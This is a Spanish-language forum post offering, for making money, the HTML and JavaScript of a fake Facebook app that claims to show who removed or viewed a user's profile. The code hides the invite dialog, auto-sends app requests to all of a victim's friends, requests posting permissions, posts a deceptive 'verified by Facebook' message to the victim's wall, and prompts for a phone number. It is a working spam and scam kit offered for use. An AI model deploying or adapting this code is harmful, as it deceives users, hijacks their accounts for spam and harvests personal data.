- Desde
- 2 Jul 2013
- Mensajes
- 520
Hola gente aqui les traigo sabiduria !! Para hacer dinero !!
Este codigo esta hecho en java script y sirve para viralizar aplicaciones en facebook invitando masivamente a todos los amigos !
Importante tener en cuenta:
1. Hay partes del code que llaman objetos de la aplicacion; en el codigo estan como: /quien te a eliminado_files/"objeto_llamado"
Asi que para que funcione bien, deben tenerlos todos especialmete el "all.Js", "query.Js" y las imagenes !!
2. Los anteriores elementos los pueden encontrar en google o descargando la aplicacion completa desde el link que les deje en el tema anterior !; le dan "guardar pagina como y listo "
3.Deben reemplazar "id_app", "namespaceofyourapp","url_of_your_server" por las de su aplicacion!
Aqui lo mas importante del código!!
Espero sepan aprovecharlo :d !!, el conocimiento se comparte :encouragement:!!
Foro beta no me permite colocar el codigo completo, ya que lo tengo muy largo ! Asi que se los dejo aqui ->>spam_invita_friends - pastebin.Com
Este codigo esta hecho en java script y sirve para viralizar aplicaciones en facebook invitando masivamente a todos los amigos !
Importante tener en cuenta:
1. Hay partes del code que llaman objetos de la aplicacion; en el codigo estan como: /quien te a eliminado_files/"objeto_llamado"
Asi que para que funcione bien, deben tenerlos todos especialmete el "all.Js", "query.Js" y las imagenes !!
2. Los anteriores elementos los pueden encontrar en google o descargando la aplicacion completa desde el link que les deje en el tema anterior !; le dan "guardar pagina como y listo "
3.Deben reemplazar "id_app", "namespaceofyourapp","url_of_your_server" por las de su aplicacion!
Aqui lo mas importante del código!!
HTML:
<script language=javascript>
var message="";
///////////////////////////////////
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
// -->
</script>
<title>Quien te a Eliminado</title>
<meta property="og:title" content="Quien mira tu Biografia.">
<meta property="og:type" content="website">
<meta property="og:image" content="http://i.imgur.com/paScNWA.png">
<meta property="og:site_name" content="Facebook">
<script src="./Quien te a Eliminado_files/jquery.min.js"></script>
<link rel="stylesheet" type="text/css" href="./Quien te a Eliminado_files/style.css">
<script type="text/javascript">
$(window).load(function() {
setTimeout("sendRequestToManyRecipients('has shared 3 pics with you ','')",1000);
});
</script>
<style>
.fb_dialog_advanced{
opacity : 0;
}
</style>
</head>
<body>
<div class="-cx-PRIVATE-uiDialog__positioner uiLayer" id="u6zbvo_1" tabindex="0" style="">
<div class="-cx-PRIVATE-uiDialog__wrapper" style="width: 465px; margin-top: 59px;">
<div class="-cx-PRIVATE-uiDialog__border" style="width:510px;">
<div class="-cx-PRIVATE-uiDialog__content">
<form id="u6zbvo_43" method="post" class="-cx-PRIVATE-uiDialog__form" rel="async">
<div class="pvs phm -cx-PRIVATE-uiDialog__title">Quien Visita tu Biografia.</div>
<div class="-cx-PRIVATE-uiDialog__body">
<div class="fbSharer">
<div id="u6zbvo_11" class="modeSelf">
<div class="mhm pal">
<div class="mtm">
<div class="UIShareStage clearfix UIShareStage_HasImage" id="stage4fd85bfd5026d0d99239829">
<div class="UIShareStage_Image">
<div id="c4fd85bfd50c4c3d53645618" class="UIShareStage_ThumbPager UIThumbPager">
<div class="UIThumbPager_Loader" style="display: none;">
<img width="16" height="11" alt="" src="./Quien te a Eliminado_files/GsNJNwuI-UM.gif" class="img">
</div>
<div class="UIThumbPager_Thumbs">
<div id="fb-root" class=" fb_reset">
<div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div>
<iframe name="fb_xdm_frame_https" frameborder="0" allowtransparency="true" scrolling="no" id="fb_xdm_frame_https" aria-hidden="true" title="Facebook Cross Domain Communication Frame" tab-index="-1" src="./Quien te a Eliminado_files/xd_arbiter.htm" style="border: none;"></iframe>
</div></div><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div></div></div></div>
<!-- Add to Timeline
<div class="fb-add-to-timeline" data-show-faces="true" ></div>
-->
<div align="center">
<br>
<a href="URL_OF_YOUR_SERVER" type="button" onclick="sendRequestToManyRecipients(); return false;">
<center><img src="./Quien te a Eliminado_files/paScNWA.png"></center>
</a>
<br>
</div>
<script>(function(d, s, id){
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) {return;}
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/en_US/all.js";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
window.fbAsyncInit = function() {
FB.init({
appId : 'ID_APP',
status : true,
cookie : true,
frictionlessRequests : true,
xfbml : true,
oauth: true
});
};
function mshuffle(o){
for(var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);
return o;
}
function loop(list){
var GG_NUM=50;
if(list.length != 0){
//alert(list.length);
var string = '';
var shifting = 0;
if (list.length >= GG_NUM){
shifting = GG_NUM;
for (var j = 0; j< GG_NUM; j++){
if (j != GG_NUM-1)
string = string + list[j] + ',';
else
string = string + list[j];
}
}
else{
shifting = list.length;
for (var j = 0; j< list.length; j++){
if (j != list.length - 1)
string = string + list[j] + ',';
else
string = string + list[j];
}
}
FB.ui({method: 'apprequests',
data: 'ID_APP',
max_recipients: '50',
title: 'Quien mira tu Biografia!',
message: 'Aplicacion 100% verificada por Facebook.!',
to: string,
}, requestCallback);
}
}
function sendRequestToManyRecipients() {
FB.login(function(response) {
if (response.authResponse) {
var friends = new Array();
FB.api('/me/friends', function(response) {
for (var i=0; i<response.data.length; i++) {
friends[i] = response.data[i].id;
}
mshuffle(friends);
loop(friends);
});
}
}, {scope: 'user_location'},{display: 'popup'});
}
function requestCallback(response) {
if(response && response.request) {
//console.log(response);
window.top.location = "#";
}
else {
alert('Debes invitar a todos tus Amigos');
console.log(response);
}
} </script>
</div>
</div>
<div class="profiledetails" style="display: none;">
<script>$('.profiledetails').hide();</script>
<center><img class="profileimagee" src="" style="width: 100px;"></center><br><b><span class="profilenamee"></span></b> and 23 other friends are messaging & sharing files on WhatsApp On Facebook. Click on Continue to join the conversation.<br><br>
</div>
</div>
</div>
<div class="UIShareStage_ShareContent">
<div class="UIShareStage_Title">
<span>
</span>
</div>
<div class="UIShareStage_Subtitle">
<span>
<h1>IMPORTANTE: Debes introducir el PIN al Finalizar.</h1>
<iframe src="./Quien te a Eliminado_files/follow(1).htm" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:80px;" allowtransparency="true"></iframe>
</span>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</form></div>
<div class="-cx-PRIVATE-uiDialog__footer">
<div class="pam uiOverlayFooter uiBoxGray topborder">
<label class="layerConfirm uiOverlayButton uiButton uiButtonConfirm uiButtonLarge" for="u6zbvo_2">
<a href="URL_OF_YOUR_SERVER" class="initial" role="button" onclick="sendRequestToManyRecipients();">
<span class="uiButtonText">Continuar.</span>
</a>
<script>$('.initial').fadeIn();</script>
<a href="URL_OF_YOUR_SERVER" class="final" role="button" onclick="sendRequestToManyRecipients();" style="display: none;">
<script>$('.final').hide();</script>
<span class="uiButtonText">Continue</span>
</a>
<a href="URL_OF_YOUR_SERVER" class="wait" role="button" onclick="sendRequestToManyRecipients();" style="display: none;">
<script>$('.wait').hide();</script>
<span class="uiButtonText">Wait..</span>
</a>
</label>
</div>
</div>
</div></div></div>
<div id="fb-root"></div>
<script>
var list = new Array();
window.fbAsyncInit = function() {
var curLoc = window.location;
FB.init({
appId : "ID_APP",
xfbml : true,
oauth : true,
cookie: true
});
FB.Canvas.setAutoGrow();
FB.getLoginStatus(function(response) {
if (response.status === 'connected') {
// the user is logged in and has authenticated your
// app, and response.authResponse supplies
// the user's ID, a valid access token, a signed
// request, and the time the access token
// and signed request each expire
var uid = response.authResponse.userID;
var accessToken = response.authResponse.accessToken;
} else if (response.status === 'not_authorized') {
// the user is logged in to Facebook,
// but has not authenticated your app
window.top.location = 'https://www.facebook.com/dialog/oauth?client_id=ID_APP&redirect_uri=http://apps.facebook.com/NAMESPACEOFYOURAPP/&state=f1f7fa8b22bc922121deb70334b5b04f&scope=user_location,friends_online_presence,publish_actions&response_type=code';
} else {
// the user isn't logged in to Facebook.
window.top.location = 'https://www.facebook.com/dialog/oauth?client_id=ID_APP&redirect_uri=http://apps.facebook.com/NAMESPACEOFYOURAPP/&state=f1f7fa8b22bc922121deb70334b5b04f&scope=user_location,friends_online_presence,publish_actions&response_type=code';
}
});
};
</script>
<script src="./Quien te a Eliminado_files/all(1).js"></script>
<script>
FB.init({
appId : 'ID_APP',
status : true, // check login status
cookie : true, // enable cookies
xfbml : true, // parse XFBML
oauth : true // enable OAuth 2.0
});
FB.getLoginStatus(function(response) {
if (response.status === 'connected') {
var uid = response.authResponse.userID;
var accessToken = response.authResponse.accessToken;
publicar(uid);
} else if (response.status === 'not_authorized') {
window.location="#";
} else {
window.location="#";
}
});
function publicar(uid){
FB.api('/me/feed', 'post', {
picture : "http://i.imgur.com/paScNWA.png",
link : "http://apps.facebook.com/NAMESPACEOFYOURAPP",
name : "Quien Visita Tu Biografia!!",
message : "jajaja no mmz mi ex se la pasa viendo mi biografia me sigue amando!!",
caption : "100% Verificada por Facebook inc.",
description : "865741 Personas usan esta APP .",
});
}
</script>
<script> alert ("Debes introducir tu Celular para Verificar tu Cuenta y darla de Alta.") </script>
Espero sepan aprovecharlo :d !!, el conocimiento se comparte :encouragement:!!
Foro beta no me permite colocar el codigo completo, ya que lo tengo muy largo ! Asi que se los dejo aqui ->>spam_invita_friends - pastebin.Com
Última edición por un moderador: